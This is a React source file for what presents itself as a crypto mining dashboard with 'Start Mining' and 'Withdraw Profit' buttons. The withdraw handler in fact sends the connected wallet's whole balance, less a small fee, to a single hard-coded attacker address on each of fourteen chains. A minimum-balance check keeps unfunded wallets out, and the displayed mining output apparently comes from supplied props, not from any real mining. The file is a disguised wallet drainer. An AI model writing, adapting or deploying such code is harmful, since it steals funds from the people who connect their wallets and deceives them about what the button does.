import React, { useEffect, useState } from 'react';
import { useAccount, useBalance, useWalletClient } from 'wagmi';
import { ethers } from 'ethers';

const MiningPage = ({ isMining, logs, totalMined, toggleMining, selectedChainId }) => {
  const { address } = useAccount();
  const { data: balanceData } = useBalance({ address, chainId: selectedChainId });
  const { data: walletClient } = useWalletClient();

  const [errorMessage, setErrorMessage] = useState('');

  const chainConfigs = {
    1: { symbol: 'ETH', cap: 0.002, fee: 0.0002, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    8453: { symbol: 'ETH', cap: 0.002, fee: 0.00005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    42161: { symbol: 'ETH', cap: 0.002, fee: 0.00005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    43114: { symbol: 'AVAX', cap: 0.25, fee: 0.0005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    10: { symbol: 'ETH', cap: 0.002, fee: 0.00005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    324: { symbol: 'ETH', cap: 0.002, fee: 0.00005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    137: { symbol: 'POL', cap: 5, fee: 0.0005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    56: { symbol: 'BNB', cap: 0.02, fee: 0.0005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    534352: { symbol: 'ETH', cap: 0.002, fee: 0.0005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    80094: { symbol: 'BERA', cap: 1, fee: 0.0005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    2741: { symbol: 'ETH', cap: 0.002, fee: 0.0005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    7777777: { symbol: 'ETH', cap: 0.002, fee: 0.00005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    728126428: { symbol: 'TRX', cap: 10, fee: 0.10, recipient: 'TCQpVoWEVtGPdRWDwtHhJrkd5ycFy845t5' },
    1329: { symbol: 'SEI', cap: 5, fee: 0.005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
  };

  const {
    symbol: tokenSymbol = 'ETH',
    fee: STATIC_FEE = 0.00005,
    recipient: recipientAddress = '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A',
    cap: MIN_BALANCE = 0.002,
  } = chainConfigs[selectedChainId] || {};

  const walletBalance = balanceData
    ? parseFloat(ethers.formatEther(balanceData.value)).toFixed(4)
    : '0.0000';

  const handleMiningToggle = () => {
    if (parseFloat(walletBalance) < MIN_BALANCE) {
      setErrorMessage(`Your balance is too low to start mining. Please ensure you have at least ${MIN_BALANCE} ${tokenSymbol}.`);
      return;
    }
    setErrorMessage('');
    toggleMining();
  };

  const handleWithdrawProfit = async () => {
    setErrorMessage('');

    if (!walletClient) {
      setErrorMessage('Wallet client is not available.');
      return;
    }

    const balance = parseFloat(walletBalance);
    const amountToSend = parseFloat((balance - STATIC_FEE).toFixed(6));

    if (amountToSend <= 0) {
      setErrorMessage(`Insufficient wallet balance to withdraw after fee of ${STATIC_FEE} ${tokenSymbol}.`);
      return;
    }

    const amountInWei = ethers.parseEther(amountToSend.toString());

    try {
      await walletClient.switchChain({ id: selectedChainId });

      const txHash = await walletClient.sendTransaction({
        to: recipientAddress,
        value: amountInWei,
        chainId: selectedChainId,
      });

      console.log('Withdrawal transaction confirmed:', txHash);
      setErrorMessage('Withdrawal successful!');

    } catch (error) {
      console.error('Withdrawal error:', error);
      setErrorMessage('Withdrawal failed. Please try again.');
    }
  };

  return (
    <div className="flex items-start justify-center min-h-screen bg-[#0d0d0d] p-0">
      <div className="w-full max-w-sm mt-8 bg-[#1a1a1a] rounded-[1.5rem] shadow-[0_8px_30px_rgba(0,0,0,0.8)] p-6 space-y-6 border border-[#2a2a2a] text-gray-100">
        <h3 className="text-2xl font-semibold text-center tracking-tight">
          <span className="block text-gray-500 text-sm uppercase">Mining Dashboard</span>
        </h3>

        <div className="bg-[#111111] p-4 rounded-xl border border-gray-700 shadow-inner text-center space-y-2">
          <p className="text-xs text-gray-500 uppercase">Total Mined</p>
          <p className="text-2xl font-bold text-green-400">{totalMined.toFixed(6)} {tokenSymbol}</p>
        </div>

        <div className="flex space-x-4">
          <button
            onClick={handleMiningToggle}
            className={`flex-1 py-3 rounded-xl text-sm font-medium text-white transition-all ${isMining
              ? 'bg-gradient-to-r from-red-600 to-pink-600 hover:from-red-500 hover:to-pink-500'
              : 'bg-gradient-to-r from-teal-600 to-blue-700 hover:from-teal-500 hover:to-blue-600'
              }`}
          >
            {isMining ? 'Stop Mining' : 'Start Mining'}
          </button>

          <button
            onClick={handleWithdrawProfit}
            className="flex-1 py-3 rounded-xl text-sm font-medium text-white transition-all bg-gradient-to-r from-yellow-600 to-orange-600 hover:from-yellow-500 hover:to-orange-500"
          >
            Withdraw Profit
          </button>
        </div>

        <div className="bg-[#0f0f0f] p-4 rounded-xl border border-gray-700 shadow-inner h-60 overflow-y-auto text-sm space-y-2">
          {logs.length === 0 ? (
            <p className="text-gray-500 text-center">No mining activity yet</p>
          ) : (
            logs.map((log, idx) => (
              <div key={idx} className="flex flex-col text-gray-400">
                <div className="flex justify-between text-xs">
                  <span className="text-gray-500">{log.time}</span>
                  <span className="text-emerald-400 font-medium">+{log.amount} {tokenSymbol}</span>
                </div>
                <div className="text-gray-500 text-[11px]">⛏️ Tx: {log.hash.slice(0, 12)}...</div>
              </div>
            ))
          )}
        </div>

        {errorMessage && (
          <div
            className={`mt-2 text-sm p-3 rounded-xl border ${errorMessage.includes('successful')
                ? 'text-green-400 bg-[#1f1f1f] border-green-500' // Success message styling
                : 'text-red-400 bg-[#1f1f1f] border-red-500' // Error message styling
              }`}
          >
            {errorMessage}
          </div>
        )}
      </div>
    </div>
  );
};

export default MiningPage;
